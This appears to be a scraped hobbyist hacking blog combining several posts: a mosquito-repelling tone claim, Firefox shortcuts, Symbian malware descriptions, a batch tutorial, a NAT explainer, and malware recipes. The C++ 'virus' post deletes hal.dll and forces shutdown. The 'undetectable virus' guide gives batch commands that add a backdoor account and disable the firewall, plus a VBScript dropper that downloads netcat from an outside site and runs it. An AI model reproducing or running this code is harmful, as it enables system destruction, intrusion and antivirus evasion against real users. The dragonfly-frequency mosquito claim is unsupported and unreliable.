KILL MOSQUITOES WITH YOUR COMPUTER

Stop using chemical based Insecticides to kill mosquitoes, because you might kill yourself.

Download these Anti Mosquito software to repel those annoying insects and be safer & greener


How does it work?
Dragonflies are the mortal enemy for mosquitoes and in flight they generate sound frequencies (approximately) between 67 Hz and 45 Hz, depending on their sizes.

56 Hz is a good average number in between those frequencies. Your PC sound card and speakers will work well for this purpose. There are many sound and tone generator programs available on the internet for both the Mac and Windows PC. Setup your computer with the sound/tone generator program running and then play the sound through your computer speakers. The speakers can be aimed directionally for complete room coverage.

The sound level on the speakers should be adjusted so it is barely audible. This arrangement can be setup in a bedroom where you would like to have the window open but are worried about mosquitoes. One speaker should be fairly close to where you are sleeping.

Here are some links to more advanced tone generator software which can actually sweep between the 45 Hz and 67 Hz frequencies:

http://www.nch.com.au/tonegen/index.html
http://www.esseraudiosolutions.com/ttg.htm

Read More

Shortcut Keys For Firefox!

Windows Keyboard Shortcuts for Mozilla Firefox
CTRL + A Select all text on a webpage
CTRL + B Open the Bookmarks sidebar
CTRL + C Copy the selected text to the Windows clipboard
CTRL + D Bookmark the current webpage
CTRL + F Find text within the current webpage
CTRL + G Find more text within the same webpage
CTRL + H Opens the webpage History sidebar
CTRL + I Open the Bookmarks sidebar
CTRL + J Opens the Download Dialogue Box
CTRL + K Places the cursor in the Web Search box ready to type your search
CTRL + L Places the cursor into the URL box ready to type a website address
CTRL + M Opens your mail program (if you have one) to create a new email message
CTRL + N Opens a new Firefox window
CTRL + O Open a local file
CTRL + P Print the current webpage
CTRL + R Reloads the current webpage
CTRL + S Save the current webpage on your PC
CTRL + T Opens a new Firefox Tab
CTRL + U View the page source of the current webpage
CTRL + V Paste the contents of the Windows clipboard
CTRL + W Closes the current Firefox Tab or Window (if more than one tab is open)
CTRL + X Cut the selected text
CTRL + Z Undo the last action
Windows Keyboard Shortcuts for Mozilla Firefox

F1 Opens Firefox help
F3 Find more text within the same webpage
F5 Reload the current webpage
F6 Toggles the cursor between the address/URL input box and the current webpage
F7 Toggles Caret Browsing on and off. Used to be able to select text on a webpage with the keyboard.

F11 Switch to Full Screen mode

Read More

SYMBIAN VIRUSES......

HONE BOOK STEALER

Description:

This type of mobile virus is very interesting that it'll steal user phonebook data and then it will compile it into a text file and sent it through
bluetooth without user confirmation.

So far, this is the first Symbian Virus that I've seen that it will steal user data without
user confirmation and sent thorogh other bluetooth supported devices.





Analysis/Observation:

This trojan was distributed in an application file and it is spreading in pbexplorer.SIS.

Symtomps:

When user try to install this suspicious *.SIS file, the image shown below is screenshoot taken during installation process:

http://img369.imageshack.us/img369/9507/8f209da05hb.jpg

After installation complete, the application has set to run automatically and will display the following text:

________________
| Phone Book |
| Compacting |
| by: lajel 202u |
| |
| please wait... |
|________________|

________________________
| Compacting |
| your contact(s),step 2 |
| |
| Please wait again |
| until done... |
|________________________|

After the malicious process done, it will pop out a message:

"Done!!!"

If user press [OK] the malicious program will ended itself and after some times,
it will start searching for bluetooth devices and sent all phonebook information in
text file via bluetooth.


Prevention:

This malware requires that the user intentionally install them upon the device. As always, users should never install third party application from unknown site.

SYMBIAN TROJAN--Mabtal.A....

Profimail v2.75_FULL.SIS/SymbOS Mabtal.A is a SIS file malware that pretends to be a cracked version of Profimail which is a very popular E-Mailing third party application in Symbian Platform, in fact, it is a malware which drops Mabir.A, Caribe and Fontal variants into the phone system, besides, it also drops some corrupted binaries file which causing the phone auto-restart and showing fatal error message. Next the phone will fail to boot-up permanently.


Positive analysis results:

While tested using the above handsets, both platform was affected. When user tries to install the suspicious file into his phone, it will look like the below image:

user posted image

While installing the suspicious file, it will show a message as shown below:
http://img268.imageshack.us/img268/2144/317e79031ih.th.jpg


This suspicious file automatically installed all files into the phone memory. Cabir virus will start spreading via bluetooth and keeps listening if any incoming message arrives in the phone, when any SMS/MMS message arrives in the phone, mabir.A virus will immediately sent itself out via MMS for spreading purpose.

When user tries to access the Profimail and ProfiExplorer third party application, it may display an error message as shown below:
http://img268.imageshack.us/img268/7508/76ff985d6zw.th.jpg

After it has successfully restart, due to the corrupted fonts, the device can't boot up permanently.

By using the hash-number-matching method, the following files was proved to be a malware files while analyzing work is in progress:

11x12 euro_fonts.gdr detected as SymbOS.Fontal.A
CARIBE0.APP detected as SymbOS.Mabir.A
CARIBE0.RSC detected as SymbOS.Cabir
flo0.mdl detected as SymbOS.Mabir.A
flo.mdl detected as SymbOS.Mabir.A
caribe.app detected as SymbOS.Mabir.A
caribe.rsc detected as SymbOS.Cabir
Appinst.app detected as SymbOS.Cabir.U2
Appinst.aif detected as SymbOS.Cabir.U2


This malware doesn't come with any valid digital certificate but it can replicate itself via bluetooth or MMS(Mabir.A) and it will cause severe damage to Symbian OS 6.1 handsets!

SplinterCell-ChaosTheory_S60_cracked-XiMPDA.SIS OR SymbOS/Skudoo.A..


This is a Series 60 trojan that installs skulls trojan, MGdropper, Commwarrior, Doomboot.A and cabir into the targeted device. When this trojan executed, most of application in the phone being replaced by a non-functional or corrupted files by the trojan into the phone, causing application can't run as usual. It fails to attack NOKIA 6680 while the phone has been restarted. Anyway, McAfee AVERT mentioned that this trojan will cause the phone fail to reboot on the next restart by the user.

It is also the first mobie trojan in the world which capable propagates MGDropper virus and Commwarrior virus vice-versa.

It contains also the image as shown below while I have extracted the *.SIS file:
http://i21.photobucket.com/albums/b261/McAfee88/aa.gif

Some of the blank icon that the trojan drops actually is coded to auto restart the phone, when the phone has been restarted, the menu function of the phone can't no longer be function and thus this totally lock the whole phone.

When user tries to installs the trojan into the phone, the symptoms are as shown below:
http://i21.photobucket.com/albums/b261/McAfee88/P1010045.jpg

While installing the suspicious file into the phone, it will pop up a message as shown below:
http://i21.photobucket.com/albums/b261/McAfee88/ccb3703e.jpg

Read More

powerful c++ virus

This is a powerful C++ virus that I have made, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.
The Original Code:

Code:
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}A more advanced version of this virus which makes the C:\\Windows\\ a variable that cannot be wrong was made by getores. Here it is:

Code:
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.

Read More

Batch Programming Basics

A tutorial by Nikhil on The Basic's of Batch file programming. Explains you what batch file programming is and hot to create batch files.
The Basics of Batch File Programming

Batch file programming is nothing but a batch of DOS ( Disk Operating System ) commands, hence the name Batch. If you code a lot and know many languages you are sure to notice that Operating System ( OS )specific langauges ( languages that work only on a particular operating system, eg: Visual Basic Scripting works only in Windows ) give you amazing control over the system. This is why Batch is so powerfull, it gives you absolute control over DOS. Batch isnt reccomended at all because it is OS specific, but it is fun and easy to learn. This tutorial will not only teach you Batch file programming but also how to fend for yourself and learn more commands that tutorials dont teach you.
The first command you should know is ECHO. All ECHO does is simply print something onto the screen. It's like "printf" in C or "PRINT" in Basic. Anyway, this is how we use it.

ECHO Hello World!

All right, now save the above line as a .bat file and double click it. This should be the output -

C:WINDOWSDesktop>ECHO Hello World!
Hello World!

Hmmm, notice that it shows the command before executing it. But we're coders right? We dont want our code to look so untidy so just add an @ sign before ECHO and execute it. Woohoo! much better. The @ sign tells DOS to hide from the user whatever commands it is executing. Now, what if I want to write to a file? This is how I do it -

@ECHO Hello World > hello.txt

Simple huh? Remember, ">" to create or overwrite a file and ">>" to append ( write at the end ) of a file that already exists. Guess why this program wont work as desired to -

@ECHO Hello World > hello.txt
@ECHO Hello World Again > hello.txt

Looking at it, you will see that the program is supposed to write two lines one after another but it wont work because in the first line it will create a file called hello.txt and write the words "Hello World" to it, and in the second line it just over-writes the earlier text. So actually what it is doing is that it creates a file and writes to it and then over-writes what it had earlier written, to change this we just add a ">". The additional ">" will make DOS append to the file. So here's the improved form of the program -

@ECHO Hello World > hello.txt
@ECHO Hello World Again >> hello.txt

Save the above code as a .bat file and execute it, it will work without a hitch. The next thing we should learn is the GOTO statement. GOTO is just the same as it is in BASIC or for that fact any programming langauge but the only difference is between the labels.

This is a label in C or BASIC - label:

This is a label in batch - :label

In C or BASIC, the ":" comes after the label and in Batch it comes before the label. Bear this in mind as you proceed. Here's an example of the GOTO statement -

:labelone
@ECHO LoL
GOTO labelone

If you execute this code, you will see that it is an unlimited loop; it will keep printing to the screen till the end of time if you dont interupt it Smile The GOTO statement is very usefull when it comes to building big Batch programs. Now, we will learn the IF and EXIST commands. The IF command is usually used for checking if a file exists, like this -

@IF EXIST C:WINDOWSEXPLORER.EXE ECHO It exists

Observe that I have not used inverted commas ( " ) as I would in BASIC or C. The EXIST command is only found in Batch and not in any other language. The EXIST command can also be used to check if a file does not exist, like this -

@IF NOT EXIST C:WINDOWSEXPLORER.EXE ECHO It does not exist

Remember, Batch is not a language like C or BASIC or Pascal, it cannot do mathematical functions. In Batch, all you can do is control DOS. In the above example notice that there is no THEN command as there would be in most languages.
Sick and tired off using the @ sign before each and every command ? Let's do some research, go to the DOS prompt and type in ECHO /? and press enter. Interesting, in this way, when you hear of a new DOS command you dont know about, just type in "command /?" and you can get help on it. Now back to ECHO. According to the help we received by typing in ECHO /? you must have concluded if you type in ECHO OFF you no longer need to type an @ sign before every command.
Wait! just add an @ before ECHO OFF so that it does not display the message - ECHO is off.

The next command we are going to learn about is the CLS command. It stands for CLear Screen. If you know BASIC, you will have no problem understanding this command. All it does is clear the screen. Here's an example -

@ECHO OFF
CLS
ECHO This is DOS

This command need's no further explanation but type in CLS /? to get more help on the command.

The next command we are going to learn is CD. It stands for Current Directory. It displays the current directory in which you are if you just type in "CD" but if you type in"CD C:WindowsDesktop" it will take you to the Desktop. Here's an example -

@ECHO OFF
CD C:WindowsDesktop
ECHO Testing.. > test.txt
ECHO Testing...>>test.txt

This will change the directory to the Desktop and create a file there called test.txt and write to it. If we had not used the CD command, this is how the program would have looked.

@ECHO OFF
ECHO Testing.. > C:WindowsDesktoptest.txt
ECHO Testing...>> C:WindowsDesktoptest.txt

See the difference? Anyway that's all for the The Basics of Batch File Programming. Remember, each an every DOS command can be used in Batch.

Read More

How does IP mapping for data transmission over networks work?

You probably what TCP/IP is;any computer using TCP/IP has a unique IP address by which data in the form of packets is sent and recieved from other computers.The process of passing data packets from one computer to another by analysing the "routing tables" to reach the destination is known as routing.
A routing table is a database of defined rules that determines the best path for data packets as they go towards their destination IP address.The process of routing is performed by a device called router.
But the IP addresses used for internal or private networks r not registered;they r reffered to as local IP addresses.These addresses are used for data transmission within the LAN,and r not visible on the internet.For data transmission from the internal network to the internet,the local IP address is registered as global IP address by Network Access Translation (NAT).
NAT provides security by hiding internal IP addresses,enables the use of more IP addresses without the possibility of IP address conflicts , and multiple ISDN(Integrated Services Digital Network) connections aooear as a single internet connections.This provides a first line of defence,but because NAT only translates IP addresses,a firewall is ususlly used in conjuction with a NAT router with security against incoming security data packets from the internet.The firewall could b software or hardware.

In some Detail : NAT

NAT is a standard that enables use of seperate sets of IP addresses for internal and external traffic.The translation of local IP addresses to global IP addresses is one-to-one(one internal address to one global address) or many to many-to-one(a group of internal address to one global address) basis while connectig to the internet.NAT can b used by a computer,a router,or a firewall.
NAT has several forms,such as static,dyanimic,overloading or overlapping.Static NAT translates any unregistered local IP on a one-to-one basis to a registered global IP address.The Internet Assigned Numbers Authority(IANA) has reserved three blocks of the IP address space for private networks:
10.0.0.0-10.255.255.255
(24-bit block)
172.16.0.0-172.31.255.255
(20-bit block)
192.168.0.0-192.168.255.255
(16-bit block)
Any enterprise can use such IP addresses,and these will b unique within that enterprise.When the enterprises needs to connet to the net ,it needs to get a unique global/public IP address from the internet registryThat public network will never b assigned from the three blocks from the private networks.
As an example,192.168.21.14 will b translated as 212.15.48.105 and used for external traffic.Dynamic NAT translates any local unregistered IP address to a registered global IP address from a group or range of global IP addresses.For eg. 192.168.21.14 willb translated to any of the global IP addresses ranging from 212.15.148.105 to 212.15.148.120
In the case of overloading,each IP address on the private network is translated to a registered IP address ,but with a different port number.The internal IP might be in use by any other network.
In some cases,the internal IP range might be a registered range in use by another network.Here the NAT translates addresses to avoid potential conflicts.This is called overlapping.It can be done by using static NAT or by using DNS or dynamic NAT.
Firewalls r intrusion protection systems to prevent packets from unsecured,unknown or unauthorised locations coming in.Firewalls can b softwares or hardware.We have a good no. of tutorials about firewalls but still....NAT router offers packet-filtering firewalls(hardware firewalls).These examine the source IP address and port,to determine wether the packet is to be accepted or dropped.

Hardware Firewall

On a hardware firewall,user created or predefined rules about packets to be blocked from specific TCP/IP ports are configured.The firewall uses a technique of packet filtering by which it examines the header of incoming packets to determine their source and destination.It is then determined wether to take the packet or exclude it.
With hardware firewall only incoming traffic is restricted,and not out going traffic.So a malicious program such as a keylogger,which has already entered the network and is concealed as a safe program,can send information to its destination.
Also,at times,routing through the router is blocked,and peer-to-peer activity on the network is not possible if the private network uses a NAT-enabled router.
There is a debate wether NAT will be necessary,wether it will provide a better security,etc. when IPv6 is implemented.The debate goes on............

Read More

How to create a new undetectable virus in 3 easy steps

This article will demonstrate how an average PC user can create a piece of malicious software in minutes that will be undetected by all the major anti-malware scanning engines.

This article is for informational purposes only and the author disclaims any responsibility for your use or misuse of any of the information contained herein.

It is well-known in blackhat circles that a new piece of malware, coded from scratch, will almost always bypass signature-based malware scanners. What is less known is that the skill needed to do this is minimal at best - an average user with no programming experience can cut and paste a few lines of code together and create a undetected malicious executable in 3 easy steps.

Most anti-virus scanners rely on a database of signatures for known viruses. Once a new virus is spread wide enough that it has been identified as malicious, the anti-virus vendors scramble to come up with a fingerprint to identify that strain of malware in the future. The obvious flaw in this process is that a new piece of malware will bypass the scanners by default, until it is widespread enough to be noticed by security researchers or picked up by a dummy node. There is always a window of opportunity for new malware between the time of deployment and the update of the signature databases and as recent malware trends demonstrate, this window is large enough to make a profit for the authors.

Roll-your-own undetected malware in 3 easy steps!

Step 1: Commands to execute

Here we compile the DOS commands that our malware will execute into a DOS batch file. As a simple proof of concept, let’s add a new user, disable the XP firewall, and create a directory on the C drive.

@echo off
net user hacksafe hacksafe /add
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
mkdir c:\haxed

Save the above as a filename.bat

Step 2: Compile to an executable

Experienced DOS users may remember a number of utilities that were able to convert a batch file into an executable (com or exe). These tools basically wrap a shell call around each of our commands and bundle the whole thing up into a tiny .exe file. One of the most well known is BAT2EXEC released by PC Magazine in 1990.

creating our malware

Our tiny executable COM file is ready to go.

Step 3: Test and Deploy

We now have a custom executable that runs some obvoiusly malicious commands: disabling the firewall and adding a new user. If we were to email this file to a target, surely any modern anti-virus scanner would pick this up as a simple batch file and alert us to the malicious code… right?

virus scan1

virus scan2

virus scan3

No patterns exist for this new piece of malware - it’s unrecognised by signature-based scanners. Heuristics and sandboxing may alert to suspicious activity, or email filtering may prevent our executable from reaching the target, but the primary mechanism of anti-malware protection has been defeated in a matter of seconds with little knowledge or skill on the part of the attacker. If the target user were to run our executable, the only indication of malicious activity would be a command prompt quickly appearing and disappearing on the desktop.

Step 4 (Optional):

A typical malware author would take the created executable and mangle it in various ways to make it harder to detect - using tools such as encrypters, packers, scramblers and EXE binders. The malicious code may be bundled with a legitimate executable, or packed with a rootkit or other remote access utility. For more information on how malware authors avoid detection, check out our article on packers and scramblers.

Example: Creating a simple dropper

A dropper is a small piece of malware designed to “drop” another peice of malware onto a system. It usually comes in the form of a simple executable that, when executed, retrieves a file from a hardcoded web or ftp site and executes it (usually a rootkit or botnet suite).

As a proof of concept, we can create a simple dropper using VBscript in a batch file that pulls down a copy of netcat from the Hacksafe site and executes it:

echo Dim DataBin >hacksafe.vbs
echo Dim HTTPGET >>hacksafe.vbs
echo Set HTTPGET = CreateObject(”Microsoft.XMLHTTP”) >>hacksafe.vbs
echo HTTPGET.Open “GET”, “http://www.hacksafe.com.au/nc.exe“, False>>hacksafe.vbs
echo HTTPGET.Send >>hacksafe.vbs
echo DataBin = HTTPGET.ResponseBody >>hacksafe.vbs
echo Const adTypeBinary=1 >>hacksafe.vbs
echo Const adSaveCreateOverWrite=2 >>hacksafe.vbs
echo Dim test1 >>hacksafe.vbs
echo Set test1 = CreateObject(”ADODB.Stream”) >>hacksafe.vbs
echo test1.Type = adTypeBinary >>hacksafe.vbs
echo test1.Open >>hacksafe.vbs
echo test1.Write DataBin >>hacksafe.vbs
echo test1.SaveToFile “malware.exe”, adSaveCreateOverWrite >>hacksafe.vbs
hacksafe.vbs
malware.exe -h

We compile using one of the many bat conversion utilities - Bat-to-Exe Converter 1.1. (This utility packs the output file using UPX, which may cause some anti-virus scanners to flag the file as potentially suspicious).

bat2exe dropper

After creating our simple dropper.exe we submit it for scan:

dropper scanned for malware

Nothing found. It would be trivial to include the firewall disable command from the previous example and configure a netcat command line to listen on an incoming port and spawn a command shell. A new, undetected yet incredibly simple and obvious, remote access trojan!

It is hoped that this article serves to demonstrate the fundamental flaw of signature-based malware detection systems.

Some additional points to consider:

*
A .COM file under 64kb can be renamed to an .EXE (or .scr, or .lnk, etc) and will still execute.
*
Heuristics and behaviour analysis may detect malicious activity.
*
The examples above assume XP sp2 and the user has local admin privileges.
*
Many bat2exe utilities use a packer or scrambler that is recognised by signatures.
*
Anyone with programming experience can see that the above can be achieved using execve(), system().
*
This is old, old news. People were hacking BBS’s using BAT2EXE in the early 90’s!

Batch to EXE Convertors

BAT2EXE - http://www.computerhope.com/dutil.htm

Batch2EXE Convertor - http://www.softpedia.com/get/System/File-Management/Batch-To-Exe-Converter.shtml

Bat2COM - http://www.techpronow.com/modules/mydownloads/singlefile.php?cid=2&lid=15

ExeScript - http://www.surfpack.com/downloads/ExeScript/21361.html

Online Virus Scanning

VirusTotal - http://www.virustotal.com/

Jotti’s Malware Scan - http://virusscan.jotti.org/

Kaspersky - http://www.kaspersky.com/scanforvirus

Thanks for reading! We welcome your feedback and comments!

(And no, we will not help you with your new 0day worm or virus, so please don’t ask!)

Read More